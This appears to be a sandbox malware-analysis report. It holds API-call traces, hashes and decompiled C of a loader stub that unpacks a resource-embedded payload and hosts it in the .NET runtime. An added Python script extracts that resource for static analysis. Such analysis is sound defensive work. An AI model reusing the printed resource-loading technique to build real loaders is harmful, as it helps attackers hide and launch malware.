                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction ID: c51224e98b3290249a921cd21f88fe5a1fccf930ce89716fb54963b60278337e
                • Opcode Fuzzy Hash: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction Fuzzy Hash: B3D017B1C50308BBEB00EBA2C8468ADBB6DEB10702F10829ABC0066101EAB59B109A50
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Executed Functions

                C-Code - Quality: 100%
                			E00401E1D() {
                				_Unknown_base(*)()* _t1;
                
                				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                				return _t1;
			}

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401489() {
                				void* _v8;
                				struct HRSRC__* _t4;
                				long _t10;
                				struct HRSRC__* _t12;
                				void* _t16;
                
                				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                				_t12 = _t4;
                				if(_t12 == 0) {
                					L6:
                					ExitProcess(0);
                				}
                				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                				if(_t16 != 0) {
                					_v8 = LockResource(_t16);
                					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                					_t13 = _v8;
                					if(_v8 != 0 && _t10 != 0) {
                						L00401000(_t13, _t10); // executed
                					}
                				}
                				FreeResource(_t16);
                				goto L6;
			}

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                  • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                • ExitProcess.KERNEL32 ref: 004014EE
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                • String ID: v4.0.30319
                • API String ID: 2372384083-3152434051
                • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%
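
E00401489 above, from the stub in process 14, looks up resource type 10 (RT_RCDATA) with ID 1 in its own image (FindResourceW, LoadResource, LockResource, SizeofResource), hands pointer and size to L00401000, and L00401000 hosts the v4.0.30319 CLR through CLRCreateInstance. To pull that payload out of the stub statically you repeat the same three-level walk of the .rsrc directory (type, then ID, then language) against the on-disk section. The Python below is an added example, not code from the sample or from the report: `find_resource` walks a raw .rsrc section, `rsrc_section` locates that section in a PE file, and `build_sample_rsrc` constructs a synthetic section for testing (the RVA 0x4000 used there is an arbitrary assumed value). Whether L00401000 decodes the bytes further before handing them to the CLR is not shown on this page, so the extracted blob is not assumed to be a ready-to-run assembly.

```python
# Added example: locate RT_RCDATA / ID 1 the way FindResourceW would, but from
# the on-disk .rsrc section. Not code from the sample or from the report.
import struct
import sys

RT_RCDATA = 10          # third argument of FindResourceW in E00401489
SUBDIR = 0x80000000     # high bit of OffsetToData: entry points at a subdirectory


def _read_directory(rsrc: bytes, off: int):
    """Entries of one IMAGE_RESOURCE_DIRECTORY as (id, is_name, target, is_dir)."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, off + 12)
    entries, pos = [], off + 16
    for _ in range(n_named + n_id):
        name, target = struct.unpack_from("<II", rsrc, pos)
        entries.append((name & 0x7FFFFFFF, bool(name & 0x80000000),
                        target & 0x7FFFFFFF, bool(target & 0x80000000)))
        pos += 8
    return entries


def find_resource(rsrc: bytes, rsrc_rva: int, res_type: int, res_id: int):
    """Return the bytes of resource (type, id) or None, taking the first language."""
    for ident, is_name, target, is_dir in _read_directory(rsrc, 0):
        if is_name or ident != res_type or not is_dir:
            continue
        for ident2, is_name2, target2, is_dir2 in _read_directory(rsrc, target):
            if is_name2 or ident2 != res_id or not is_dir2:
                continue
            for _, _, target3, is_dir3 in _read_directory(rsrc, target2):
                if is_dir3:
                    continue
                # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData is an RVA, not a section offset.
                data_rva, size = struct.unpack_from("<II", rsrc, target3)
                start = data_rva - rsrc_rva
                if start < 0 or start + size > len(rsrc):
                    raise ValueError("resource data lies outside the .rsrc section")
                return bytes(rsrc[start:start + size])
    return None


def rsrc_section(pe: bytes):
    """Find the .rsrc section of a PE file on disk: (raw bytes, VirtualAddress)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    n_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    sec = e_lfanew + 24 + opt_size
    for _ in range(n_sections):
        name = pe[sec:sec + 8].rstrip(b"\0")
        va, raw_size, raw_ptr = struct.unpack_from("<III", pe, sec + 12)
        if name == b".rsrc":
            return pe[raw_ptr:raw_ptr + raw_size], va
        sec += 40
    raise ValueError("no .rsrc section")


def build_sample_rsrc(payload: bytes, rsrc_rva: int) -> bytes:
    """Constructed test data: a minimal .rsrc holding RT_RCDATA / 1 / 0x409 -> payload."""
    def directory(entries):
        hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, len(entries))
        return hdr + b"".join(struct.pack("<II", i, t) for i, t in entries)
    root = directory([(RT_RCDATA, SUBDIR | 0x18)])      # 24 bytes -> next dir at 0x18
    by_id = directory([(1, SUBDIR | 0x30)])             # 24 bytes -> next dir at 0x30
    by_lang = directory([(0x409, 0x48)])                # 24 bytes -> data entry at 0x48
    data_entry = struct.pack("<IIII", rsrc_rva + 0x58, len(payload), 0, 0)
    blob = root + by_id + by_lang + data_entry
    assert len(blob) == 0x58
    return blob + payload


if __name__ == "__main__":
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as fh:
            raw, va = rsrc_section(fh.read())
        data = find_resource(raw, va, RT_RCDATA, 1)
        sys.stdout.buffer.write(data or b"")
    else:
        demo = build_sample_rsrc(b"constructed payload", 0x4000)
        print(find_resource(demo, 0x4000, RT_RCDATA, 1))
```

`python extract_rcdata.py <stub.exe> > payload.bin` writes exactly the bytes the stub passes to L00401000; if the result does not start with `MZ`, the stub transforms the resource before hosting it and the next step is to look at L00401000 itself.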

                APIs
                • GetCurrentProcess.KERNEL32 ref: 007FB730
                • GetCurrentThread.KERNEL32 ref: 007FB76D
                • GetCurrentProcess.KERNEL32 ref: 007FB7AA
                • GetCurrentThreadId.KERNEL32 ref: 007FB803
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID: H{
                • API String ID: 2063062207-457636133
                • Opcode ID: dd6afa6459c1c432b921a63367a743ca6c5cbc7c02cfba718a8933014b24b7a1
                • Instruction ID: 08fa4fabb574d2a77b64bc08c5182395f4b3ee6a2217f9cc494213237dc56e7f
                • Opcode Fuzzy Hash: dd6afa6459c1c432b921a63367a743ca6c5cbc7c02cfba718a8933014b24b7a1
                • Instruction Fuzzy Hash: 3F5145B09006888FDB10CFA9D9887EEBBF4FF89314F20845AE119B7360D7749985CB65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32 ref: 007FB730
                • GetCurrentThread.KERNEL32 ref: 007FB76D
                • GetCurrentProcess.KERNEL32 ref: 007FB7AA
                • GetCurrentThreadId.KERNEL32 ref: 007FB803
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID: H{
                • API String ID: 2063062207-457636133
                • Opcode ID: 5709d8a8c6f045605c7fe480741a3964d20c43eb427d5a84516cdeff7e57cf90
                • Instruction ID: 27a08efa8fe057e85bf6b3e6061eb297c2bf914fd7011fcf6447b05796d558c3
                • Opcode Fuzzy Hash: 5709d8a8c6f045605c7fe480741a3964d20c43eb427d5a84516cdeff7e57cf90
                • Instruction Fuzzy Hash: D85135B09006488FDB14CFA9D548BEEBBF5FF88314F20846AE119B7360D7749944CB65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 007F7F5D
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: CallbackDispatcherUser
                • String ID: H{
                • API String ID: 2492992576-457636133
                • Opcode ID: d99e16692a2a4371f8661bd71a57e05ab5b2f74c2f7f50dc7b74a8fb45e3856d
                • Instruction ID: fa4f4fc7a752658a23bd6dd068c6442d603dff8a2d48877ab770bae8c6f5eab4
                • Opcode Fuzzy Hash: d99e16692a2a4371f8661bd71a57e05ab5b2f74c2f7f50dc7b74a8fb45e3856d
                • Instruction Fuzzy Hash: 12118CB18087998FDB11CFA4D8047EABFF4AB09314F14845AD594B7252C37C9A05CB75
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004055C5(void* __ecx) {
                				void* _t6;
                				void* _t14;
                				void* _t18;
                				WCHAR* _t19;
                
                				_t14 = __ecx;
                				_t19 = GetEnvironmentStringsW();
                				if(_t19 != 0) {
                					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                					_t18 = _t6;
                					if(_t18 != 0) {
                						E0040ACF0(_t18, _t19, _t12);
                					}
                					E00403E03(0);
                					FreeEnvironmentStringsW(_t19);
                				} else {
                					_t18 = 0;
                				}
                				return _t18;
			}

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: EnvironmentStrings$Free
                • String ID:
                • API String ID: 3328510275-0
                • Opcode ID: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                • Opcode Fuzzy Hash: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6d19e23270c91cd0bfe84ebd0c9fb17a9cc2156a33487eae434a7910410bdbe9
                • Instruction ID: f5647a603d073dbadc31bedace59c1aa92cad6c085d72fc5aa8a28d0dc55da7b
                • Opcode Fuzzy Hash: 6d19e23270c91cd0bfe84ebd0c9fb17a9cc2156a33487eae434a7910410bdbe9
                • Instruction Fuzzy Hash: FD22B378E04205DFEB14CB94D498AFEB7B2FF49310F26C555D422AB364C7B4A885CB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 051BD29D
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 78704a247361928bd2464d56c02e3f1663489bcb46a245731631636f2fd5ce4b
                • Instruction ID: fe5c241255d85bb0362855234ef6221bf6672b10176fc54787125edef3e03232
                • Opcode Fuzzy Hash: 78704a247361928bd2464d56c02e3f1663489bcb46a245731631636f2fd5ce4b
                • Instruction Fuzzy Hash: 33C12874A01258DFEB14DFA9D884EEDB7B2FF48314F118159E402AB3A1D7B59C81CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2637d53392b1cde2e254eb88123f8d922b8666c5098c714ccf1a28d9dc659215
                • Instruction ID: e089fc5ad9835869880614124eb94abbafcb32679139e602631e9d1bae3264a4
                • Opcode Fuzzy Hash: 2637d53392b1cde2e254eb88123f8d922b8666c5098c714ccf1a28d9dc659215
                • Instruction Fuzzy Hash: 90811B728093889FCF16CFA5C8906DDBFB1FF5A304F19819AE444AB262D7359846CF51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 007F962E
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 8534dbb27ee7613436b14a17d5f1b9e807b3cd615f494273214deb5d2e88a935
                • Instruction ID: 5f43a8bcf3b97ad54c0d35b64404e474f90122c880835e8b54bd1c4bbac01dd6
                • Opcode Fuzzy Hash: 8534dbb27ee7613436b14a17d5f1b9e807b3cd615f494273214deb5d2e88a935
                • Instruction Fuzzy Hash: 00712570A00B098FDB64DF69C4457AAB7F1BF88314F108929D64ADBB40DB78E946CF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateActCtxA.KERNEL32(?), ref: 051B46B1
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: d7699ac0b16dfd5e17bda2c3e9e83aa1034d95460ae73d824a699b45ea319936
                • Instruction ID: 0de1515dd1ff7afcc0d6c60b0cf9778d96d5ddff9548396c00b4a08af968e834
                • Opcode Fuzzy Hash: d7699ac0b16dfd5e17bda2c3e9e83aa1034d95460ae73d824a699b45ea319936
                • Instruction Fuzzy Hash: 11411471C04658CFEF20DFA9C8847DDBBB6BF49304F208169D509AB251D7B5694ACF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 007FFD0A
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 3dbeeec9f539ef51ac2334645bb9e74a2d95e798ff7a739dbe129d6bfe366ef3
                • Instruction ID: e5494ab80b4b7d37334b5865ae8a11b0a3be335f364c62672174ea9faff35d40
                • Opcode Fuzzy Hash: 3dbeeec9f539ef51ac2334645bb9e74a2d95e798ff7a739dbe129d6bfe366ef3
                • Instruction Fuzzy Hash: 5841CFB1D00358DFDF14CF9AC884ADEBBB5BF48314F24812AE919AB214DB749945CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateActCtxA.KERNEL32(?), ref: 051B46B1
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 47994276a1551cc4170ba8f977a0e25bf9d7d2bd9ebdcb8a39513bd5d155f3a9
                • Instruction ID: c349b5b33148a7911abc37e42a4a4181adb79bbc4479bb7bc413e9578b5df0fd
                • Opcode Fuzzy Hash: 47994276a1551cc4170ba8f977a0e25bf9d7d2bd9ebdcb8a39513bd5d155f3a9
                • Instruction Fuzzy Hash: 4C41DFB1C0465C8ADF24DFA9C884BDDBBB6BB49308F208069D509AB255D7B46945CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 051B2531
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: f934484a47a3bec524941fea3d34fd85e527e08d7a2c83be4262080ae3162fea
                • Instruction ID: c124c7b874210ba645a4bb8c7eeb879a5af1a85c61c278dea32eb0f1af449672
                • Opcode Fuzzy Hash: f934484a47a3bec524941fea3d34fd85e527e08d7a2c83be4262080ae3162fea
                • Instruction Fuzzy Hash: C7411AB8A002458FDB14CF99C448AEEBBF6FF88314F14C459D529AB325D774A945CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051BB957
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 48bdf37905862cf0a5d9fb7c60f155d0cc1edb5beb4a8a3da77d888f3604370a
                • Instruction ID: d86efcf57ab10c34f0c892811a66705e088b9bca6aeecabff96ac9191321141e
                • Opcode Fuzzy Hash: 48bdf37905862cf0a5d9fb7c60f155d0cc1edb5beb4a8a3da77d888f3604370a
                • Instruction Fuzzy Hash: 3A318BB2908388AFDB118FA9C840ADEBFF8EF09310F14805AF554A7221C335D955DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007FBD87
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 78a0601bacbc3b9d85be279d53a233686aa560f75c266d8ab94babcacaca267b
                • Instruction ID: 84d70450ef60f677de8f54fa52bec8a0003410e7449a753b7f0cb90804a4f34a
                • Opcode Fuzzy Hash: 78a0601bacbc3b9d85be279d53a233686aa560f75c266d8ab94babcacaca267b
                • Instruction Fuzzy Hash: 7321C4B59012489FDB10CFA9D884AEEFBF5FB48314F14841AE958B7310D378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,007B53E8,00000000,?), ref: 051BE73D
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 12e33c428ed94f7714b058d5ed30180f3f68fc292d6da60cb871aaf51ae5b3e5
                • Instruction ID: 89f2c5f07506c0c57365a60846f6515abd0bf992efc22b9243e3a1089ac429fa
                • Opcode Fuzzy Hash: 12e33c428ed94f7714b058d5ed30180f3f68fc292d6da60cb871aaf51ae5b3e5
                • Instruction Fuzzy Hash: 65214AB18043489FDB11CF95C985BDEBBF8EF09314F14845AE854A7251D378A949CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 007FBD87
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: d1ae0ce7e0cc79f7eecff09931b4d65b9de1b5b27e655c5aacbd8407843323f4
                • Instruction ID: 76baf9a929bb7b7c260c347b2cf349f89c3e7ad2ccb1ee449e5c6e8e5ee3f352
                • Opcode Fuzzy Hash: d1ae0ce7e0cc79f7eecff09931b4d65b9de1b5b27e655c5aacbd8407843323f4
                • Instruction Fuzzy Hash: 8121C4B59002489FDB10CFAAD884AEEBBF4FB48314F14841AE918B7310D378A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007F96A9,00000800,00000000,00000000), ref: 007F98BA
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 55aec5a5e56154de669b566ceeb7d6dd53ae2142f98874d7d574b19c92661285
                • Instruction ID: fdbc6bf1aadcf9eda3ab3ab0d619f0f372738bd569987d5fa0ab4c4bbfbee470
                • Opcode Fuzzy Hash: 55aec5a5e56154de669b566ceeb7d6dd53ae2142f98874d7d574b19c92661285
                • Instruction Fuzzy Hash: 3F1106B19002498FDB10CF9AC444BEEFBF4EB49350F14842AD529B7700C378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,007F96A9,00000800,00000000,00000000), ref: 007F98BA
                Memory Dump Source
                • Source File: 0000000E.00000002.318379609.00000000007F0000.00000040.00000001.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: aa49b93fd18a36247ee7663aa9e4cd01b306a7c3cda7b3351c852cfc40bf0049
                • Instruction ID: 096095caaefb45921df5b7a422fd3ba3e0848577446078ea056794729d9a1aa5
                • Opcode Fuzzy Hash: aa49b93fd18a36247ee7663aa9e4cd01b306a7c3cda7b3351c852cfc40bf0049
                • Instruction Fuzzy Hash: E811F2B69002499BDB10CF9AC444BEEBBF4EB49350F10842AE629B7700C378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051BB957
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 74b2e4a4962ffeb9134c41b00b3a91ad698bc30853ddde4b986e428f892065f4
                • Instruction ID: fd549ce429e02940b82fdfc4b977367dd6af2d967d2988aae52927d2b3435fd0
                • Opcode Fuzzy Hash: 74b2e4a4962ffeb9134c41b00b3a91ad698bc30853ddde4b986e428f892065f4
                • Instruction Fuzzy Hash: BD1134B18042499FDB10CFAAC844BDEBFF8EB48320F14841AE925B7210C378A954DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,007B53E8,00000000,?), ref: 051BE73D
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 3443bc639e0812783108204c7f0ef1344ea57ff4dc97554868f7be6eb7951284
                • Instruction ID: 205b3c71dd7264f311c55987dad581b986ebbf4a286ea3ef0a644163fb4822e7
                • Opcode Fuzzy Hash: 3443bc639e0812783108204c7f0ef1344ea57ff4dc97554868f7be6eb7951284
                • Instruction Fuzzy Hash: CF1128B58007499FDB10CF99C485BEEBBF8FB48310F10842AE554B3240D378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05276890
                Memory Dump Source
                • Source File: 0000000E.00000002.321291512.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 106ec896b10376394f1ef076bf5475a4bdde127f63983cb64112732ff2114c22
                • Instruction ID: ca863f9f6dda4a26e5f15b363af1a6d74dabcb692cdf7c25c81e477021578522
                • Opcode Fuzzy Hash: 106ec896b10376394f1ef076bf5475a4bdde127f63983cb64112732ff2114c22
                • Instruction Fuzzy Hash: 3811F5B58006498FCB10CF99D489BDEBBF4EF48324F14842AE969B7240D778A549CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 051BBCBD
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: c60bdef4d2c87589a6c1832b1c8cabdf579658ca49aa92cee3a0891f8894993f
                • Instruction ID: 89f377917c648b08e244ca71cab05b7080e21016f13d878c54f131dfcab9fcb5
                • Opcode Fuzzy Hash: c60bdef4d2c87589a6c1832b1c8cabdf579658ca49aa92cee3a0891f8894993f
                • Instruction Fuzzy Hash: 8211E0B59046489FDB20CF9AC484BDEBBF8FB48310F10885AE919B7600C3B4A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051B226A,?,00000000,?), ref: 051BC435
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 1ec24f6043838b9851b3cd2fdfa07b83fade48cf3c5b8432737dbf5ad6de8c0c
                • Instruction ID: 237b6c9d116332067b44df5544235e6e591054bf343b04042044f32e140be3d3
                • Opcode Fuzzy Hash: 1ec24f6043838b9851b3cd2fdfa07b83fade48cf3c5b8432737dbf5ad6de8c0c
                • Instruction Fuzzy Hash: 9511F5B58007499FDB10CF99C484BEEBBF8FB48314F108419E515B7600C3B4A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 051BD29D
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 54f70b64ac39bbdff2455839d0eceafe7ca42b1675949cc93033e5c3c3c74206
                • Instruction ID: 80378c763896f98991a8dbb53a59e0205570e58c857408cc4266b4c8be9b452d
                • Opcode Fuzzy Hash: 54f70b64ac39bbdff2455839d0eceafe7ca42b1675949cc93033e5c3c3c74206
                • Instruction Fuzzy Hash: 2511C5B59046499FDB10CF9AD544BDEBBF8FB48314F108459E919B7200C3B5A944CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,00000018,00000001,?), ref: 051BD29D
                Memory Dump Source
                • Source File: 0000000E.00000002.321000080.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 39f39cf3bda570ac58d04824424c36a1c9e382a962d82ac6a3a56638ee6946ec
                • Instruction ID: 5e7a75af23025208a4d1f1d3c5c4d45a9cf186760617cc9b0d7a08e23fa7c212
                • Opcode Fuzzy Hash: 39f39cf3bda570ac58d04824424c36a1c9e382a962d82ac6a3a56638ee6946ec
                • Instruction Fuzzy Hash: AE11F2B58006489FDB10CF99D885BDEBBF8FB48310F10841AE918B7600C378AA44CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindCloseChangeNotification.KERNELBASE(?), ref: 05276890
                Memory Dump Source
                • Source File: 0000000E.00000002.321291512.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false
                Similarity
                • API ID: ChangeCloseFindNotification
